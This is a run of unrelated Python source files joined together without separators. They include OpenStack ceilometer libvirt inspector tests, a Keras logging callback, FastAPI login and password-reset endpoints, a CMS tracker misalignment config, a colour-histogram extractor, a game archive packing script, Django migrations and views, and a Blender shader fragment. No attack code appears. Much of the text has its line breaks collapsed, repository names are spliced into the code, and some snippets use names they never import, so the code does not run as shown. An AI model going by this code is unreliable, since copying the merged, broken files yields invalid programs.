        self.inspector = libvirt_inspector.LibvirtInspector()
        self.inspector.connection = mock.Mock()
        libvirt_inspector.libvirt = mock.Mock()
        libvirt_inspector.libvirt.VIR_DOMAIN_SHUTOFF = 5
        libvirt_inspector.libvirt.libvirtError = self.fakeLibvirtError
        self.domain = mock.Mock()
        self.addCleanup(mock.patch.stopall)

    def test_inspect_cpus(self):
        with contextlib.ExitStack() as stack:
            stack.enter_context(mock.patch.object(self.inspector.connection,
                                                  'lookupByUUIDString',
                                                  return_value=self.domain))
            stack.enter_context(mock.patch.object(self.domain, 'info',
                                                  return_value=(0, 0, 0,
                                                                2, 999999)))
            cpu_info = self.inspector.inspect_cpus(self.instance)
            self.assertEqual(2, cpu_info.number)
            self.assertEqual(999999, cpu_info.time)

    def test_inspect_cpus_with_domain_shutoff(self):
        connection = self.inspector.connection
        with mock.patch.object(connection, 'lookupByUUIDString',
                               return_value=self.domain):
            with mock.patch.object(self.domain, 'info',
                                   return_value=(5, 0, 0, 2, 999999)):
                self.assertRaises(virt_inspector.InstanceShutOffException,
                                  self.inspector.inspect_cpus,
                                  self.instance)

    def test_inspect_vnics(self):
        dom_xml = """
    """ interface_stats = { 'vnet0': (1, 2, 0, 0, 3, 4, 0, 0), 'vnet1': (5, 6, 0, 0, 7, 8, 0, 0), 'vnet2': (9, 10, 0, 0, 11, 12, 0, 0), } interfaceStats = interface_stats.__getitem__ connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'interfaceStats', side_effect=interfaceStats)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) interfaces = list(self.inspector.inspect_vnics(self.instance)) self.assertEqual(3, len(interfaces)) vnic0, info0 = interfaces[0] self.assertEqual('vnet0', vnic0.name) self.assertEqual('fa:16:3e:71:ec:6d', vnic0.mac) self.assertEqual('nova-instance-00000001-fa163e71ec6d', vnic0.fref) self.assertEqual('255.255.255.0', vnic0.parameters.get('projmask')) self.assertEqual('10.0.0.2', vnic0.parameters.get('ip')) self.assertEqual('10.0.0.0', vnic0.parameters.get('projnet')) self.assertEqual('10.0.0.1', vnic0.parameters.get('dhcpserver')) self.assertEqual(1, info0.rx_bytes) self.assertEqual(2, info0.rx_packets) self.assertEqual(3, info0.tx_bytes) self.assertEqual(4, info0.tx_packets) vnic1, info1 = interfaces[1] self.assertEqual('vnet1', vnic1.name) self.assertEqual('fa:16:3e:71:ec:6e', vnic1.mac) self.assertEqual('nova-instance-00000001-fa163e71ec6e', vnic1.fref) self.assertEqual('255.255.255.0', vnic1.parameters.get('projmask')) self.assertEqual('192.168.0.2', vnic1.parameters.get('ip')) self.assertEqual('192.168.0.0', vnic1.parameters.get('projnet')) self.assertEqual('192.168.0.1', vnic1.parameters.get('dhcpserver')) self.assertEqual(5, info1.rx_bytes) self.assertEqual(6, info1.rx_packets) self.assertEqual(7, info1.tx_bytes) self.assertEqual(8, info1.tx_packets) vnic2, info2 = interfaces[2] self.assertEqual('vnet2', vnic2.name) self.assertEqual('fa:16:3e:96:33:f0', vnic2.mac) self.assertIsNone(vnic2.fref) self.assertEqual(dict(), vnic2.parameters) self.assertEqual(9, info2.rx_bytes) self.assertEqual(10, info2.rx_packets) self.assertEqual(11, info2.tx_bytes) self.assertEqual(12, info2.tx_packets) def test_inspect_vnics_with_domain_shutoff(self): connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999))) inspect = self.inspector.inspect_vnics self.assertRaises(virt_inspector.InstanceShutOffException, list, inspect(self.instance)) def test_inspect_disks(self): dom_xml = """
    """ with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(self.inspector.connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'blockStats', return_value=(1, 2, 3, 4, -1))) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) disks = list(self.inspector.inspect_disks(self.instance)) self.assertEqual(1, len(disks)) disk0, info0 = disks[0] self.assertEqual('vda', disk0.device) self.assertEqual(1, info0.read_requests) self.assertEqual(2, info0.read_bytes) self.assertEqual(3, info0.write_requests) self.assertEqual(4, info0.write_bytes) def test_inspect_disks_with_domain_shutoff(self): connection = self.inspector.connection with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999))) inspect = self.inspector.inspect_disks self.assertRaises(virt_inspector.InstanceShutOffException, list, inspect(self.instance)) def test_inspect_memory_usage(self): fake_memory_stats = {'available': 51200, 'unused': 25600} connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(0, 0, 51200, 2, 999999)): with mock.patch.object(self.domain, 'memoryStats', return_value=fake_memory_stats): memory = self.inspector.inspect_memory_usage( self.instance) self.assertEqual(25600 / units.Ki, memory.usage) def test_inspect_disk_info(self): dom_xml = """
    """ with contextlib.ExitStack() as stack: stack.enter_context(mock.patch.object(self.inspector.connection, 'lookupByUUIDString', return_value=self.domain)) stack.enter_context(mock.patch.object(self.domain, 'XMLDesc', return_value=dom_xml)) stack.enter_context(mock.patch.object(self.domain, 'blockInfo', return_value=(1, 2, 3, -1))) stack.enter_context(mock.patch.object(self.domain, 'info', return_value=(0, 0, 0, 2, 999999))) disks = list(self.inspector.inspect_disk_info(self.instance)) self.assertEqual(1, len(disks)) disk0, info0 = disks[0] self.assertEqual('vda', disk0.device) self.assertEqual(1, info0.capacity) self.assertEqual(2, info0.allocation) self.assertEqual(3, info0.physical) def test_inspect_memory_usage_with_domain_shutoff(self): connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(5, 0, 0, 2, 999999)): self.assertRaises(virt_inspector.InstanceShutOffException, self.inspector.inspect_memory_usage, self.instance) def test_inspect_memory_usage_with_empty_stats(self): connection = self.inspector.connection with mock.patch.object(connection, 'lookupByUUIDString', return_value=self.domain): with mock.patch.object(self.domain, 'info', return_value=(0, 0, 51200, 2, 999999)): with mock.patch.object(self.domain, 'memoryStats', return_value={}): self.assertRaises(virt_inspector.NoDataException, self.inspector.inspect_memory_usage, self.instance) class TestLibvirtInspectionWithError(base.BaseTestCase): class fakeLibvirtError(Exception): pass def setUp(self): super(TestLibvirtInspectionWithError, self).setUp() self.inspector = libvirt_inspector.LibvirtInspector() self.useFixture(fixtures.MonkeyPatch( 'ceilometer.compute.virt.libvirt.inspector.' 'LibvirtInspector._get_connection', self._dummy_get_connection)) libvirt_inspector.libvirt = mock.Mock() libvirt_inspector.libvirt.libvirtError = self.fakeLibvirtError @staticmethod def _dummy_get_connection(*args, **kwargs): raise Exception('dummy') def test_inspect_unknown_error(self): self.assertRaises(virt_inspector.InspectorException, self.inspector.inspect_cpus, 'foo') class TestLibvirtInitWithError(base.BaseTestCase): def setUp(self): super(TestLibvirtInitWithError, self).setUp() self.inspector = libvirt_inspector.LibvirtInspector() libvirt_inspector.libvirt = mock.Mock() @mock.patch('ceilometer.compute.virt.libvirt.inspector.' 'LibvirtInspector._get_connection', mock.Mock(return_value=None)) def test_init_error(self): self.assertRaises(virt_inspector.NoSanityException, self.inspector.check_sanity) @mock.patch('ceilometer.compute.virt.libvirt.inspector.' 
'LibvirtInspector._get_connection', mock.Mock(side_effect=virt_inspector.NoDataException)) def test_init_exception(self): self.assertRaises(virt_inspector.NoDataException, self.inspector.check_sanity) Empythy/geometry-learningmodel/topoml_util/LoggerCallback.py import pprint from keras.callbacks import Callback import random from datetime import datetime import numpy as np pp = pprint.PrettyPrinter() class EpochLogger(Callback): def __init__(self, input_func=None, target_func=None, predict_func=None, aggregate_func=None, sample_size=3, stdout=False, input_slice=lambda x: x[0:1], target_slice=lambda x: x[1:2]): super().__init__() self.input_func = input_func self.target_func = target_func self.predict_func = predict_func self.aggregate_func = aggregate_func self.sample_size = sample_size self.log_to_stdout = stdout self.input_slice = input_slice self.target_slice = target_slice def on_epoch_end(self, epoch, logs=None): random.seed(datetime.now()) sample_indexes = random.sample(range(len(self.validation_data[0])), self.sample_size) inputs = np.array(self.input_slice(self.validation_data)) targets = np.array(self.target_slice(self.validation_data)) input_samples = [inputs[:, sample_index] for sample_index in sample_indexes] target_samples = [targets[:, sample_index] for sample_index in sample_indexes] predictions = [] for sample_index in sample_indexes: sample = inputs[:, sample_index:sample_index + 1] predictions.append(self.model.predict([*sample])) print('\nLogging output for %i inputs, targets and predictions...' % len(predictions)) for (inputs, targets, predictions) in zip(input_samples, target_samples, predictions): if self.log_to_stdout: print('Input:') pp.pprint(inputs) print('Target:') pp.pprint(targets) print('Prediction:') pp.pprint(predictions) print('') if self.aggregate_func: self.aggregate_func( (self.input_func(inputs), self.target_func(targets), self.predict_func(predictions))) mannamman/newsCrawl0 from finBERT.finbert.finbert import predict from transformers import AutoModelForSequenceClassification import os import json from typing import Dict class FinBert: def __init__(self): # 실행한 디렉토리 기준으로 상대경로를 입력 self.path = "finBERT/models/sentiment" self.model = AutoModelForSequenceClassification.from_pretrained(self.path, num_labels=3,cache_dir=None) self.labels = ["positive", "negative", "neutral"] def _make_dic(self, text, logit): return_dic = { "sentence" : text, } for label, val in zip(self.labels, logit): return_dic[label] = val return return_dic def pred(self, text: str) -> Dict[str,any]: text = text.replace('"', "'") res = json.loads(predict(text, self.model, self.path).to_json(orient='records'))[0] return self._make_dic(text, res["logit"]) if(__name__ == "__main__"): fin = FinBert() fin.pred("Inflation at 40-year high pressures consumers, Fed and Biden")1-10 from sklearn.datasets import fetch_20newsgroups categories = [ 'alt.atheism', 'sci.space', ] remove = ('headers', 'footers', 'quotes') data_train = fetch_20newsgroups(subset='train', categories=categories, remove=remove) data_test = fetch_20newsgroups(subset='test', categories=categories, remove=remove) X_train, y_train = data_train.data, data_train.target X_test, y_test = data_test.data, data_test.target len(X_train) len(X_test) from sklearn.linear_model import Ridge log_reg_tfid = Pipeline([ ('vectorizer', TfidfVectorizer(stop_words="english")), ('classifier', LogisticRegression(solver='liblinear', random_state=42)), ]) log_reg_tfid.fit(X_train, y_train) log_reg_tfid.score(X_train, y_train) log_reg_tfid.score(X_test, 
y_test) feature_names = log_reg_tfid["vectorizer"].get_feature_names() fig, ax = plt.subplots(figsize=(15, 6)) plot_important_features(log_reg_tfid["classifier"].coef_.ravel(), feature_names, top_n=20, ax=ax) # -*- coding: utf-8 -*- """ Login API endpoints. """ from datetime import timedelta import typing as tp from fastapi import APIRouter from fastapi import Body from fastapi import Depends from fastapi.security import OAuth2PasswordRequestForm from app.api.utils.storage import get_uow from app.api.utils.security import get_current_user from app.core import config from app.core.jwt import create_access_token from app.crud.core import UnitOfWork from app.db.models.user import User as DBUser from app.exceptions import APIError from app.models.message import Message from app.models.token import Token from app.models.user import User from app.models.user import UserUpdate from app.models.user import UserInDB from app.utils.security import generate_password_reset_token from app.utils.security import verify_password_reset_token from app.utils.email import send_password_reset_email router = APIRouter() @router.post("/login/access-token", response_model=Token) async def login_access_token( *, form_data: OAuth2PasswordRequestForm = Depends(), uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """OAuth2 compatible token login. Acquires an access token to be used for future requests. Parameters ---------- form_data : OAuth2PasswordRequestForm The OAuth2 request form data to use. uow : UnitOfWork The unit of work object to use. Returns ------- Mapping[str, str] A mapping of access token data. Raises ------ APIException If the user could not be logged or is not an active user. """ user = uow.user.authenticate(form_data.username, form_data.password) if not user: raise APIError("Invalid username or password") elif not user.is_active: raise APIError("Inactive user") access_token_expires = timedelta( minutes=config.ACCESS_TOKEN_EXPIRE_MINUTES ) access_token = create_access_token( {"user_id": user.uid}, expires_delta=access_token_expires ) return {'accessToken': access_token, 'tokenType': "bearer"} @router.post("/login/test-token", response_model=User) async def test_token( *, current_user: UserInDB = Depends(get_current_user) ) -> DBUser: """Tests the given authentication token for validity. Parameters ---------- current_user : UserInDB The current user to test the token for. Returns ------- User The user with the valid token. """ return current_user @router.post('/password-recovery/{email}', response_model=Message) async def recover_password( email: str, *, uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """Send a password recovery email to the user. Parameters ---------- email : str The email address to send a password recovery email for. uow : UnitOfWork The unit of work object to use. Returns ------- Mapping[str, str] The message from the password recovery result. """ user = uow.user.get_by_email(email) if user: password_reset_token = generate_password_reset_token(email=email) send_password_reset_email( email_to=user.email, email=email, token=password_reset_token ) return {"value": "Password recovery email sent."} @router.post("/reset-password/", response_model=Message) async def reset_password( *, token: str = Body(...), new_password: str = Body(...), uow: UnitOfWork = Depends(get_uow) ) -> tp.Mapping[str, str]: """Resets a user's password from the given reset token. Parameters ---------- token : str The password reset token to use. 
    new_password : str
        The new, plaintext password to set.
    uow : UnitOfWork
        The unit of work object to use.

    Returns
    -------
    Mapping[str, str]
        The message from the password reset result.

    Raises
    ------
    APIException
        If the token isn't valid, or the user associated is not an active
        user.
    ObjectNotFoundException
        If the user specified by the decoded token does not exist.

    """
    email = verify_password_reset_token(token)
    if not email:
        raise APIError("Invalid token.")
    user = uow.user.get_by_email(email, raise_ex=True)
    if not uow.user.is_active(user):
        raise APIError("Inactive user.")
    updated_user = UserUpdate(password=new_password)
    with uow:
        uow.user.update(user, updated_user)
    return {"value": "Password updated successfully"}

from __future__ import print_function
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
import copy, sys, os

process = cms.Process("Misaligner")

###################################################################
# Setup 'standard' options
###################################################################
options = VarParsing.VarParsing()

options.register('myScenario',
                 "MisalignmentScenario_PhaseI_PseudoAsymptotic", # default value
                 VarParsing.VarParsing.multiplicity.singleton,   # singleton or list
                 VarParsing.VarParsing.varType.string,           # string, int, or float
                 "scenario to apply")

options.register('mySigma',
                 -1,                                             # default value
                 VarParsing.VarParsing.multiplicity.singleton,   # singleton or list
                 VarParsing.VarParsing.varType.float,            # string, int, or float
                 "sigma for random misalignment in um")

options.register('inputDB',
                 None,                                           # default value
                 VarParsing.VarParsing.multiplicity.singleton,   # singleton or list
                 VarParsing.VarParsing.varType.string,           # string, int, or float
                 "input database file to override GT (optional)")

options.parseArguments()

###################################################################
# Message logger service
###################################################################
process.load("FWCore.MessageService.MessageLogger_cfi")
process.MessageLogger.cout = cms.untracked.PSet(
    threshold = cms.untracked.string('INFO'),
    default = cms.untracked.PSet(
        limit = cms.untracked.int32(10000000)
    )
)
# replace MessageLogger.debugModules = { "*" }
# service = Tracer {}

###################################################################
# Ideal geometry producer and standard includes
###################################################################
process.load('Configuration.Geometry.GeometryRecoDB_cff')

###################################################################
# Just state the Global Tag (and pick some run)
###################################################################
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
# process.GlobalTag = GlobalTag(process.GlobalTag, "auto:run2_design", "")
process.GlobalTag = GlobalTag(process.GlobalTag, "auto:phase1_2017_design", "")
print("Using global tag:", process.GlobalTag.globaltag.value())

###################################################################
# This uses the object from the tag and applies the misalignment
# scenario on top of that object
###################################################################
process.load("Alignment.CommonAlignmentProducer.AlignmentProducer_cff")
process.AlignmentProducer.doMisalignmentScenario=True
process.AlignmentProducer.applyDbAlignment=True
process.AlignmentProducer.checkDbAlignmentValidity=False #otherwise error thrown for IOV dependent GTs
import 
Alignment.TrackerAlignment.Scenarios_cff as scenarios if hasattr(scenarios, options.myScenario): print("Using scenario:", options.myScenario) print(" with sigma:", options.mySigma) print() process.AlignmentProducer.MisalignmentScenario = getattr(scenarios, options.myScenario) else: print("----- Begin Fatal Exception -----------------------------------------------") print("Unrecognized",options.myScenario,"misalignment scenario !!!!") print("Aborting cmsRun now, please check your input") print("----- End Fatal Exception -------------------------------------------------") sys.exit(1) sigma = options.mySigma if sigma > 0: process.AlignmentProducer.MisalignmentScenario.scale = cms.double(0.0001*sigma) # shifts are in cm if options.inputDB is not None: process.GlobalTag.toGet.extend([ cms.PSet( connect = cms.string("sqlite_file:"+options.inputDB), record = cms.string("TrackerAlignmentRcd"), tag = cms.string("Alignments") ), cms.PSet( connect = cms.string("sqlite_file:"+options.inputDB), record = cms.string("TrackerAlignmentErrorExtendedRcd"), tag = cms.string("AlignmentErrorsExtended") ) ]) process.AlignmentProducer.saveToDB=True process.AlignmentProducer.saveApeToDB=True ################################################################### # Output name ################################################################### outputfilename = None scenariolabel = str(options.myScenario) if sigma > 0: scenariolabel = scenariolabel+str(sigma) outputfilename = "geometry_"+str(scenariolabel)+"__from_" if options.inputDB is None: outputfilename += process.GlobalTag.globaltag.value()+".db" else: outputfilename += options.inputDB ################################################################### # Source ################################################################### process.source = cms.Source("EmptySource") process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1)) ################################################################### # Database output service ################################################################### from CondCore.CondDB.CondDB_cfi import * process.PoolDBOutputService = cms.Service( "PoolDBOutputService", CondDB, timetype = cms.untracked.string("runnumber"), toPut = cms.VPSet( cms.PSet( record = cms.string("TrackerAlignmentRcd"), tag = cms.string("Alignments") ), cms.PSet( record = cms.string("TrackerAlignmentErrorExtendedRcd"), tag = cms.string("AlignmentErrorsExtended") ), ) ) process.PoolDBOutputService.connect = "sqlite_file:"+outputfilename process.PoolDBOutputService.DBParameters.messageLevel = 2 server/pyfol/shape_predict/func/src/color_recognition_api/color_histogram_feature_extraction.py import os import cv2 import numpy as np this_path = str(os.path.split(__file__)[0]) def color_histogram_of_test_image(test_src_image): # load the image chans = cv2.split(test_src_image) colors = ('b', 'g', 'r') features = [] feature_data = '' counter = 0 for (chan, color) in zip(chans, colors): counter = counter + 1 hist = cv2.calcHist([chan], [0], None, [256], [0, 256]) features.extend(hist) # find the peak pixel values for R, G, and B elem = np.argmax(hist) if counter == 1: blue = str(elem) elif counter == 2: green = str(elem) elif counter == 3: red = str(elem) feature_data = red + ',' + green + ',' + blue # print(feature_data) with open(this_path+'/test.data', 'w') as myfile: myfile.write(feature_data) def color_histogram_of_training_image(img_name): # detect image color by using image file name to label training data str_1 = img_name.split(this_path)[1] if 'red' in 
str_1: data_source = 'RED' elif 'yellow' in str_1: data_source = 'YELLOW' elif 'green' in str_1: data_source = 'GREEN' elif 'orange' in str_1: data_source = 'ORANGE' elif 'white' in str_1: data_source = 'WHITE' elif 'black' in str_1: data_source = 'BLACK' elif 'blue' in str_1: data_source = 'BLUE' elif 'purple' in str_1: data_source = 'PURPLE' elif 'brown' in str_1: data_source = 'BROWN' elif 'pink' in str_1: data_source = 'PINK' # load the image image = cv2.imread(img_name) chans = cv2.split(image) colors = ('b', 'g', 'r') features = [] feature_data = '' counter = 0 for (chan, color) in zip(chans, colors): counter = counter + 1 hist = cv2.calcHist([chan], [0], None, [256], [0, 256]) features.extend(hist) # find the peak pixel values for R, G, and B elem = np.argmax(hist) if counter == 1: blue = str(elem) elif counter == 2: green = str(elem) elif counter == 3: red = str(elem) feature_data = red + ',' + green + ',' + blue with open(this_path+'/training.data', 'a') as myfile: myfile.write(feature_data + ',' + data_source + '\n') def training(): color = ['red', 'yellow', 'green', 'orange', 'white', 'black', 'blue', 'brown', 'pink', 'purple'] for c in color: # Please check your own path if you got error from color_path # Using os.getcwd() for check the real path # color_path = os.path.join('..', 'color_training_dataset', c) for fluke color_path = os.path.join(this_path,'color_training_dataset', c) # print(color_path) for file in os.listdir(color_path): file_path = os.path.join(color_path, file) # print(file_path) color_histogram_of_training_image(file_path) Scripts/archive_bsa.py #! python3 import sys import re import os.path import shutil import util import bsa_rules import subprocess def ArchiveBSA(target_folder, bsa_filename): script_path = util.GetScriptPath() utilities_path = util.GetUtilitiesPath() archive_original = os.path.join(utilities_path, "Archive.exe") util.LogDebug("Copy Archive.exe to target folder") archive = os.path.join(target_folder, "Archive.exe") shutil.copy2(archive_original, archive) log_basename = "log.txt" log_filename = os.path.join(target_folder, log_basename) config_basename = "bsa_config.txt" config_filename = os.path.join(target_folder, config_basename) allFilesList = [] checks = {} util.LogInfo("Build File List") totalFileSizeTally = 0 target_data = os.path.join(target_folder, "Data") util.LogDebug("Walking the target directory " + target_data) for root, subdirs, files in os.walk(target_data): util.LogDebug('--\nroot = ' + root) if root == target_data: util.LogDebug("subdirs: " + str(subdirs)) lower_case_data_list = [x.lower() for x in subdirs] util.LogDebug("lcds: " + str(lower_case_data_list)) if "meshes" in lower_case_data_list: util.LogDebug("found meshes") checks["Retain Strings During Startup"] = True checks["Meshes"] = True if "textures" in lower_case_data_list: util.LogDebug("found texttures") checks["Textures"] = True if "interface" in lower_case_data_list: util.LogDebug("found interface") checks["Menus"] = True if "music" in lower_case_data_list: util.LogDebug("found music") checks["Retain File Names"] = True checks["Sounds"] = True if "sound" in lower_case_data_list: util.LogDebug("found sound") sound_list = os.listdir(os.path.join(target_data, "sound")) sound_list_lower = [x.lower() for x in sound_list] if "fx" in sound_list_lower: util.LogDebug("found sound//fx") checks["Retain File Names"] = True checks["Sounds"] = True if "voice" in sound_list_lower: util.LogDebug("found sound//voice") checks["Voices"] = True if "shadersfx" in 
lower_case_data_list: util.LogDebug("found shaders") checks["Shaders"] = True if "seq" in lower_case_data_list: util.LogDebug("found seq") checks["Retain File Names"] = True checks["Misc"] = True if "grass" in lower_case_data_list: util.LogDebug("found grass") checks["Retain File Names"] = True checks["Misc"] = True if "scripts" in lower_case_data_list: util.LogDebug("found scripts") checks["Retain File Names"] = True checks["Misc"] = True else: for filename in files: if filename != "desktop.ini": file_path = os.path.join(root, filename) relative_path = file_path.replace(target_folder, '') util.LogDebug('\t- file %s (relative path: %s)' % (filename, relative_path)) path_no_data = relative_path[6:] file_size = os.path.getsize(file_path) totalFileSizeTally += file_size util.LogDebug("totalFileSizeTally is now: " + str(totalFileSizeTally)) allFilesList.append( {'FileName': filename, 'FilePath': file_path, 'RelativePath': relative_path, 'PathNoData': path_no_data, 'FileSize':file_size} ) SizeLimitBSA = bsa_rules.BSASizeLimit currentFileIndex = None currentFileSizeTally = 0 buffer = '' bsaFileWritten = [] bsa_original_filename = bsa_filename def WrtiteBSA(): nonlocal currentFileIndex, buffer, bsa_filename util.LogDebug("Writing BSA with filelist:<" + buffer + ">") filelist_basename = "bsa_filelist.txt" if currentFileIndex != None: filelist_basename = "bsa_filelist" + str(currentFileIndex) + ".txt" bsa_filename = bsa_original_filename[:-4] + str(currentFileIndex) + ".bsa" currentFileIndex += 1 filelist_filename = os.path.join(target_folder, filelist_basename) with open(filelist_filename, 'w') as filelist_file: filelist_file.write(buffer) buffer = '' util.LogInfo("Build Config") checksOrder = ["Meshes", "Textures", "Menus", "Sounds", "Voices", "Shaders", "Trees", "Fonts", "Misc", "Compress Archive", "Retain Directory Names", "Retain File Names", "Retain File Name Offsets", "Retain Strings During Startup", "XBox 360 Archive", "Embed File Names"] with open(config_filename, 'w') as config_file: config_file.write("Log: " + log_basename + "\n") config_file.write("New Archive\n") for check in checksOrder: if check in checks: config_file.write("Check: " + check + "\n") config_file.write("Set File Group Root: Data\\\n") config_file.write("Add File Group: " + filelist_basename + "\n") config_file.write("Save Archive: " + bsa_filename + "\n") util.LogInfo("Run Archive.exe") commandLine = ["Archive.exe", config_basename] os.chdir(target_folder) util.RunCommandLine(commandLine) with open(log_filename, "r") as log_file: for line in log_file: util.LogDebug(line) os.remove(log_filename) os.remove(filelist_filename) os.remove(config_filename) bsaFileWritten.append({"Folder":target_folder, "FileName":bsa_filename}) if totalFileSizeTally > SizeLimitBSA: currentFileIndex = 0 totalWrittenTally = 0 for fileInfo in allFilesList: file_size = fileInfo['FileSize'] newTally = currentFileSizeTally + file_size totalWrittenTally = totalWrittenTally + file_size util.LogDebug("Adding " + fileInfo['FileName'] + " currentFileSizeTally is " + str(currentFileSizeTally) + " file_size is " + str(file_size) + " totalWrittenTally is " + str(totalWrittenTally)) buffer += fileInfo['PathNoData'] + "\n" currentFileSizeTally += file_size if (newTally >= SizeLimitBSA) or (totalWrittenTally >= totalFileSizeTally): WrtiteBSA() currentFileSizeTally = 0 if buffer != '': util.LogWarn("BUFFER NOT EMPTY!") util.LogInfo("Clean Up") util.RemoveFile(archive) os.chdir(script_path) return bsaFileWritten if __name__ == '__main__': target_folder = 
sys.argv[1] origin_folder = sys.argv[2] bsa_basename = os.path.basename(origin_folder) + ".bsa" bsa_basename = bsa_basename.replace(" ", "") bsa_filename = os.path.join(target_folder, bsa_basename) util.InitialiseLog(bsa_filename + ".log") util.StartTimer() ArchiveBSA(target_folder, bsa_basename) util.EndTimer()from dataclasses import dataclass, field from enum import Enum from typing import Optional __NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1-NS" class NistschemaSvIvAtomicUnsignedLongEnumeration1Type(Enum): VALUE_235157797394 = 235157797394 VALUE_2841737 = 2841737 VALUE_6246890837920823 = 6246890837920823 VALUE_502437096339080 = 502437096339080 VALUE_475868893660 = 475868893660 VALUE_69228431818957325 = 69228431818957325 VALUE_16 = 16 @dataclass class NistschemaSvIvAtomicUnsignedLongEnumeration1: class Meta: name = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1" namespace = "NISTSchema-SV-IV-atomic-unsignedLong-enumeration-1-NS" value: Optional[NistschemaSvIvAtomicUnsignedLongEnumeration1Type] = field( default=None, metadata={ "required": True, } ) # Generated by Django 4.0.4 on 2022-05-05 18:26 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('EmployeeApp', '0004_rename_employeeapp_employee'), ] operations = [ migrations.RenameModel( old_name='Departments', new_name='Department', ), ] fann1993814/hanlperceptron import hanlperceptron # Load model model_path = '../data/' segmenter = hanlperceptron.Segmenter(model_path+'large/cws.bin') postager = hanlperceptron.POSTagger(model_path+'pku1998/pos.bin') nerecognizer = hanlperceptron.NERecognizer(model_path+'pku1998/ner.bin') text = '大西洋和太平洋' # Combine with CoreDictionary and Perceptron seg_res = segmenter.segment(text) pos_res = postager.tagging(seg_res) ner_res = nerecognizer.recognize(seg_res, pos_res) print(seg_res) print(pos_res) print(ner_res) # Only use Perceptron seg_res = segmenter._segment(text) pos_res = postager._tagging(seg_res) print(seg_res) print(pos_res) #!/usr/bin/env python3 from rofm.classes import Roll def display_roll(roll: Roll): low, mid, high = roll.get_drop_groups() s_low = "" if not low else "({}) ".format(" ".join(str(v) for v in low)) s_mid = " ".join(str(v) for v in mid) s_high = "" if not high else " ({})".format(" ".join(str(v) for v in high)) return "[{}{}{}] -> {}".format(s_low, s_mid, s_high, roll.value()) discordbot/utils/private.py TOPGG = { "TOKEN": "" } DISCORD = { "TOKEN": "", "DEVS": [612109647649832998], # your discord ID in here "BOT_ID": 867989642866208869, # bot discord ID here # a channel ID of your choice for these "STATISTICS_CHANNEL": 803809978469056542, "STACK_CHANNEL": 803809978469056542, "BACKUP_CHANNEL": 803809978469056542, "BUG_REPORT_CHANNEL": 803809978469056542, "ERROR_CHANNEL": 803809978469056542 } mneia_admin_export/utils.py0 from pathlib import Path from django.template.loader import render_to_string def export_sitemap_index(models): export_file = Path.home() / "Code/mneia-gr.github.io/sitemap.xml" template_file = "mneia_admin_export/sitemap-index.xml" html = render_to_string(template_file, {"models": [model.get_model_slug_plural() for model in models]}) export_file.write_text(html) 0 from django.shortcuts import get_object_or_404 from django_filters.rest_framework import DjangoFilterBackend from djoser.views import UserViewSet from rest_framework import (filters, mixins, permissions, response, status, viewsets) from rest_framework.decorators import action from .serializers_follow import FollowSerializer, 
FollowViewSerializer from recipe_features.models import Follow from recipe_features.pagination_hub import CustomResultsSetPagination from recipe_features.permissions import CurrentUserOrAdminOrReadOnly from users.models import User class CustomUserViewSet(UserViewSet): """Provides work with user and his profile depending on permission and role """ queryset = User.objects.all() permission_classes = [permissions.IsAuthenticated] filter_backends = (filters.SearchFilter,) search_fields = ("username",) pagination_class = CustomResultsSetPagination filter_backends = (DjangoFilterBackend, filters.SearchFilter) @action( detail=True, methods=['GET', 'DELETE'], url_path="subscribe", permission_classes=[CurrentUserOrAdminOrReadOnly], pagination_class=None ) def subscribe(self, request, id): if request.method == 'DELETE': return self.unsubscribe(request, id) user = self.request.user.id author = get_object_or_404(User, id=id) data = {'user': user, 'author': id} serializer = FollowSerializer( data=data, context={'request': request}) serializer.is_valid(raise_exception=True) serializer.save(user=self.request.user, author=author) return response.Response(FollowViewSerializer( author, context={'request': request}).data, status=status.HTTP_201_CREATED) def unsubscribe(self, request, pk): subscribtion = get_object_or_404( Follow, user=request.user, author=pk) subscribtion.delete() return response.Response( status=status.HTTP_204_NO_CONTENT) class FollowListSet(mixins.ListModelMixin, viewsets.GenericViewSet): pagination_class = CustomResultsSetPagination serializer_class = FollowViewSerializer permission_classes = [permissions.IsAuthenticated] def get_queryset(self): return User.objects.filter(following__user=self.request.user) # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('mainapp', '0021_auto_20150531_1904'), ] operations = [ migrations.AddField( model_name='bill', name='price_per_minute', field=models.DecimalField(default=19, max_digits=12, decimal_places=2), preserve_default=False, ), ] import bpy import arm.log as log import arm.material.cycles as c import arm.material.cycles_functions as c_functions from arm.material.parser_state import ParserState from arm.material.shader import floatstr, vec3str def parse_brightcontrast(node: bpy.types.ShaderNodeBrightContrast, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: out_col = c.parse_vector_input(node.inputs[0]) 